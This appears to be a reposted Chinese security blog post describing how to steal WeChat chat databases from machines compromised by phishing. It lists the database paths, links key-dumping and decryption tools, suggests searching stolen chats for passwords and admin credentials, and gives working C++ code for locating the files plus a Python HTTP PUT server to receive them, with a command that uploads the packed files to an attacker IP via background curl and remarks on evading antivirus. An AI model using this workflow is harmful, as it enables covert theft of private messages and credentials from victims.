|
|
场景
钓鱼攻击(通过钓鱼/微信控到的机器通常都是登录状态)
手动
https://github.com/Ormicron/Sharp-dumpkey
2、下载目标聊天数据库文件,默认保存目录在以下目录,超出240MB会自动生成MSG1.db,以此类推。
c:UserxxxxDocumentsWechat Files wxid_xxxxxMsgMultiwxid_xxxxxxxxMsgMultiMSG0.db > 聊天记录wxid_xxxxxxxxMsgMultiMSG1.db > 聊天记录wxid_xxxxxxxxMsgMultiMSG2.db > 聊天记录wxid_xxxxxxxxMsgMicroMsg.db > Contact字段 > 好友列表wxid_xxxxxxxxMsgMediaMsg.db > 语音 > 格式为silk
3.将上面三个文件回传到同目录,配合ChatViewTool打开解密即可查看,在搜索处“administrator” “root” “密码” “ip等”,项目地址。
https://github.com/Ormicron/chatViewTool
自动化
看网上用的是根据注册表获取微信默认位置,其中需要微信id,通过基址和偏移可以得到,如果上线权限较低无法操作注册表或杀软hook就很尴尬了
这里用FindFirstFile遍历全盘指定文件后缀,如MSG0.db,MicroMsg.db文件压缩打包并通过curl后台运行上传到服务器。(curl.exe win10默认自带,可以上传一个或者引用C++第三方库),项目地址。
https://github.com/c1y2m3/FileSearch服务端接收文件
参考链接:
https://floatingoctothorpe.uk/2017/receiving-files-over-http-with-python.html#!/usr/bin/env python"""Extend Python's built in HTTP server to save files"""import osimport loggingimport systry:import http.server as serverexcept ImportError:# Handle Python 2.ximport SimpleHTTPServer as serverlog_path = 'run_server_logs.log'logging.basicConfig(level=logging.INFO,format='%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s %(message)s',datefmt='%a, %d %b %Y %H:%M:%S',filename=log_path)class HTTPRequestHandler(server.SimpleHTTPRequestHandler):def do_GET(self):self.send_response(404)self.wfile.write("404 Not Found")"""Extend SimpleHTTPRequestHandler to handle PUT requests"""def do_PUT(self):"""Save a file following a HTTP PUT request"""filename = os.path.basename(self.path)# Don't overwrite filesif os.path.exists(filename):self.send_response(409, 'Conflict')self.end_headers()reply_body = '"%s" already existsn' % filenameself.wfile.write(reply_body.encode('utf-8'))returnfile_length = int(self.headers['Content-Length'])output_file = 'tmp.txt'with open(filename, 'wb') as output_file:output_file.write(self.rfile.read(file_length))self.send_response(201, 'Created')self.end_headers()reply_body = 'Saved "%s"n' % filenamelogging.info(self.headers)self.wfile.write(reply_body.encode('utf-8'))if __name__ == '__main__':if sys.argv[2:]:os.chdir(sys.argv[2])server.test(HandlerClass=HTTPRequestHandler)
最终效果
FileSearchPlus.exe default xxx.xxx.xxx.xxx
改进
1、直接读取注册表的键值,wxid关键字匹配拼接路径(碰到用户自设的路径,需要加个指定路径去)
void getPath(char *dbpath){char cmd_command[256] = { 0 };char regname[] = "Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders";HKEY hKey;DWORD dwType = REG_BINARY;REGSAM mode = KEY_READ;DWORD length = 256;int ret = RegOpenKey(HKEY_CURRENT_USER, regname, &hKey);ret = RegQueryValueEx(hKey, "Personal", 0, &dwType, (LPBYTE)dbpath, &length);strcat(dbpath, "\WeChat Files");//cout << dbpath << endl;if (ret == 0) {RegCloseKey(hKey);}else {printf("failed to open regedit.%dn", ret);}}
void getFileNames(string path, vector<string>& files){intptr_t hFile = 0;//文件信息struct _finddata_t fileinfo;string p;string::size_type idx;if ((hFile = _findfirst(p.assign(path).append("\*").c_str(), &fileinfo)) != -1){do{//如果是目录,匹配文件夹if ((fileinfo.attrib & _A_SUBDIR)){if (strstr(fileinfo.name, "wxid") != NULL)files.push_back(p.assign(path).append("\").append(fileinfo.name));}} while (_findnext(hFile, &fileinfo) == 0);_findclose(hFile);}}
3、远程拉取基址,考虑到免杀性改成了C++代码,参考。
https://github.com/Ormicron/Sharp-dumpkey
文章来源:c1y2m3博客原文地址:https://c1y2m3.github.io/2022/10/14/微信聊天记录之自动化回传/
关 注 有 礼
还在等什么?赶紧点击下方名片关注学习吧!
推 荐 阅 读
原文始发于微信公众号(潇湘信安):微信聊天记录之自动化回传
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论